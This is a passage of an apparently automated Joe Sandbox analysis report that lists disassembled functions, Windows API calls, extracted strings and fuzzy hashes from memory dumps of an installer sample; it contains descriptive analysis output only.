                            • GetLastError.KERNEL32(6CC69DD0,0000000C), ref: 6CC42642
                            • ExitThread.KERNEL32 ref: 6CC42649
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: 27e46de35f87ae7f0ae57259938b56c443c6bea10731209f8826f6c16652b29f
                            • Instruction ID: 4f38518efb7efb2ac50c4011b21d6abe45c27db4a455c4018305c6ecc2737c9d
                            • Opcode Fuzzy Hash: 27e46de35f87ae7f0ae57259938b56c443c6bea10731209f8826f6c16652b29f
                            • Instruction Fuzzy Hash: BBF0C270A00204AFDB009BB1C95DAAE3B74FF81314F24C559E50597B91EF74A945DBA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: f4ea74069ec92281a1d002224463bc321a14e5812bf8627e6a7a48075fb8b163
                            • Instruction ID: 6805e23866742bef0f9bb9c60d11d0b35062b9059ce54e5a4af6bc52c06904bc
                            • Opcode Fuzzy Hash: f4ea74069ec92281a1d002224463bc321a14e5812bf8627e6a7a48075fb8b163
                            • Instruction Fuzzy Hash: FC118C71A0420AAFCF05CF58E94499B7BF8EF49308F128069F808AB341E630ED11CBA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 4bbb83a105ad5d3ba53103dfd7da4d4e2ba566e3f8a708262e7e73960f39fb14
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: 28014F72C11159AFCF029FA89C00AEE7FB5AF08254F548165ED24E2251F7318A74EB95
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC57805,?,?,00000000,?,6CC57805,00000000,0000000C), ref: 6CC57B64
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 695bb46f4b5544c438cd117711f81d85e2ca19b955b146409417fdc1ffa5dd7c
                            • Instruction ID: 745ee82895e86dce2094d947a7185b3902c8d8ac20e5c80229783a98670d6c6f
                            • Opcode Fuzzy Hash: 695bb46f4b5544c438cd117711f81d85e2ca19b955b146409417fdc1ffa5dd7c
                            • Instruction Fuzzy Hash: E0D06C3210014DBBDF028E85DD06EDA3BBAFB88715F014040BA1856020C732E861AB90
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: f673cee7e558603484e59f94a54a550eab0375e052f77db03109b7d8543fb22f
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: C
                            • API String ID: 4218353326-4157497815
                            • Opcode ID: f82e13ef5ccc31c90b301d1b4839eba76d5f39ee82dec4ad1d1f9aa1ac4cfe77
                            • Instruction ID: 3d55e450150c8f962d734d7c1bcaab0f8dfc2e29fd90ba3a4d16cbb4f4953f71
                            • Opcode Fuzzy Hash: f82e13ef5ccc31c90b301d1b4839eba76d5f39ee82dec4ad1d1f9aa1ac4cfe77
                            • Instruction Fuzzy Hash: 2A730471644B018FC728CF29D8D0A96B7F2BF853187198B6DC09B87E95EB74B54ACB40
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6CC3945A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC39466
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC39474
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC3949B
                            • NtInitiatePowerAction.NTDLL ref: 6CC394AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: f0c29db66eedf04088599477c38dbbde98e4518552ec48b952ae3e72214be223
                            • Instruction ID: 13bbfb83a9b669416c07973bee54dfd1a86b812d574cec95724eb217d20d6b92
                            • Opcode Fuzzy Hash: f0c29db66eedf04088599477c38dbbde98e4518552ec48b952ae3e72214be223
                            • Instruction Fuzzy Hash: 4BF0BB70644704FBF650AF24CE0EB5A7BBCEF46701F014508FA49A70C1D7706994CBA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 5fee555cfaedef0713b56550febdf9447e6d84339c7030c91e7540823e1ba0c5
                            • Instruction ID: 83b6fd46da55addb86f41a2d341df9e0658217fc8818af871807e6ef421f244b
                            • Opcode Fuzzy Hash: 5fee555cfaedef0713b56550febdf9447e6d84339c7030c91e7540823e1ba0c5
                            • Instruction Fuzzy Hash: 1B4236756093828FC724CF68C480A6ABBE5BBC9354F284A1EE5D9E7760D334D885CB53
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC99CE5
                              • Part of subcall function 6CC6FC2A: __EH_prolog.LIBCMT ref: 6CC6FC2F
                              • Part of subcall function 6CC716A6: __EH_prolog.LIBCMT ref: 6CC716AB
                              • Part of subcall function 6CC99A0E: __EH_prolog.LIBCMT ref: 6CC99A13
                              • Part of subcall function 6CC99837: __EH_prolog.LIBCMT ref: 6CC9983C
                              • Part of subcall function 6CC9D143: __EH_prolog.LIBCMT ref: 6CC9D148
                              • Part of subcall function 6CC9D143: ctype.LIBCPMT ref: 6CC9D16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction ID: 94aac982c8ec828901b02367b5d124182c07cbe348afdf2e097393f2edb0d3a2
                            • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction Fuzzy Hash: 5203CD30C05289EFDF15DFA4C994BDCBBB0AF55308F248099D44967A91EB34AB89DF21
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC43969
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC43973
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC43980
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: a45ad72e487bedfb52437d0964bc607e0166c653bc6bab5db8a7cc557457be97
                            • Instruction ID: e0d3c6d6c326dd3ece4f590214aa81f1fbd9c4aa9fb77ddb91368218d042b765
                            • Opcode Fuzzy Hash: a45ad72e487bedfb52437d0964bc607e0166c653bc6bab5db8a7cc557457be97
                            • Instruction Fuzzy Hash: AE31D6749012289BCB21DF29D988BDDBBB8BF48314F5095EAE41CA7290E7709B858F44
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6CC42925,6CC3D339,00000003,00000000,6CC3D339,00000000), ref: 6CC4288F
                            • TerminateProcess.KERNEL32(00000000,?,6CC42925,6CC3D339,00000003,00000000,6CC3D339,00000000), ref: 6CC42896
                            • ExitProcess.KERNEL32 ref: 6CC428A8
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 431186d866564921a85e1182cf5b32bc6eeceb8ec960d66bf980614036ea3558
                            • Instruction ID: df4ecef0054d3efe40393a66bf978e9116e38afbd2eae3a02dea2d3f3889c4ae
                            • Opcode Fuzzy Hash: 431186d866564921a85e1182cf5b32bc6eeceb8ec960d66bf980614036ea3558
                            • Instruction Fuzzy Hash: 0EE0EC32500108AFCF016F66C91DAAD3F79FF95755B11C864F819C6A21DB3AE992EB80
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 344ee7ae7d77deb5bf70d52d4ed28eaf56fbb1519cb51c29185a9b1a441871cc
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 4591C435D011099BCF04EFAAD6D09EDB7B1FF15308F208069E851A7E51FB35998ACB51
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CC3AFA0
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC3B7C3
                              • Part of subcall function 6CC3CA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CC3B7AC,00000000,?,?,?,6CC3B7AC,?,6CC6853C), ref: 6CC3CAC9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: ebfa1d1a023415bf6484486156b95a229f2e0bcbfcfbb4e907cdb2fa63114ae8
                            • Instruction ID: ad6601e79316f4aec1859fa3600f5ee925b6f309d03afccd15efc84df15978b6
                            • Opcode Fuzzy Hash: ebfa1d1a023415bf6484486156b95a229f2e0bcbfcfbb4e907cdb2fa63114ae8
                            • Instruction Fuzzy Hash: 89B1ED71E08A189FEB14CF65D89169DBBB8FB0A318F20912ED51DE7780E3749645CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: f5bfdc870fa60912a8baa037dc67155e07bb02789a6420d1599943b676a997f2
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 552171377A4D564BD74CCA28EC33EB92680E744305B89527EE94BCB7E1DF5D8800C648
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC8840F
                              • Part of subcall function 6CC89137: __EH_prolog.LIBCMT ref: 6CC8913C
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction ID: 72c4311dccc794379a463d69bd48a5341f73306bec0cf283f99c89c0499395e8
                            • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction Fuzzy Hash: 1F627C71D02259CFDF15CFA4C894BEEBBB5BF44308F1440AAE815ABA80E7749A45CF91
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: YA1
                            • API String ID: 0-613462611
                            • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction ID: 8fa4e4d133d3a5b8a28569ba9768e078e49e33c33c38473048b5c44a3cd6b0df
                            • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction Fuzzy Hash: 014292716093818FD315CF28C49069ABBE2FFDE308F15496DE8D58B742EA71D946CB82
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: f5a0a5b05aaaa007ee2a40457aec9af575b6ec94df250f656af6351ce3ab570e
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: F551DA71A092459BD710CF5EC4C06EDFBF6EF79214F18C05EE88897242E27A5D9AC760
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction ID: e3ef4db7294d7cb92e9a581ef0c0122dbe026cc91c81a2cd739de1cf69f8825b
                            • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction Fuzzy Hash: 3C0288316083808BD725CF29C49079EBBE2BFCA318F144A2DE4D597B91E775D946CB82
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: 206b5286a6dee8fa8c02e1339c2a6385cdb68f1a60a4d9c5e7c76b6cf9a86bbf
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: CA519473E208214AD78CCF24DC2177572D2E784311F8BC1B99D8BAB6E6DD78989087D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B
                            • API String ID: 0-1255198513
                            • Opcode ID: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction ID: 21214928cf90f17d4d5673ddad9e60c3b1a701888f4008dc0319ce2e57faf3d5
                            • Opcode Fuzzy Hash: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction Fuzzy Hash: 703126315087518BD324EF28D884AABB3E2FBC4325F60CA3DD89ACBA94E7745415CF41
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
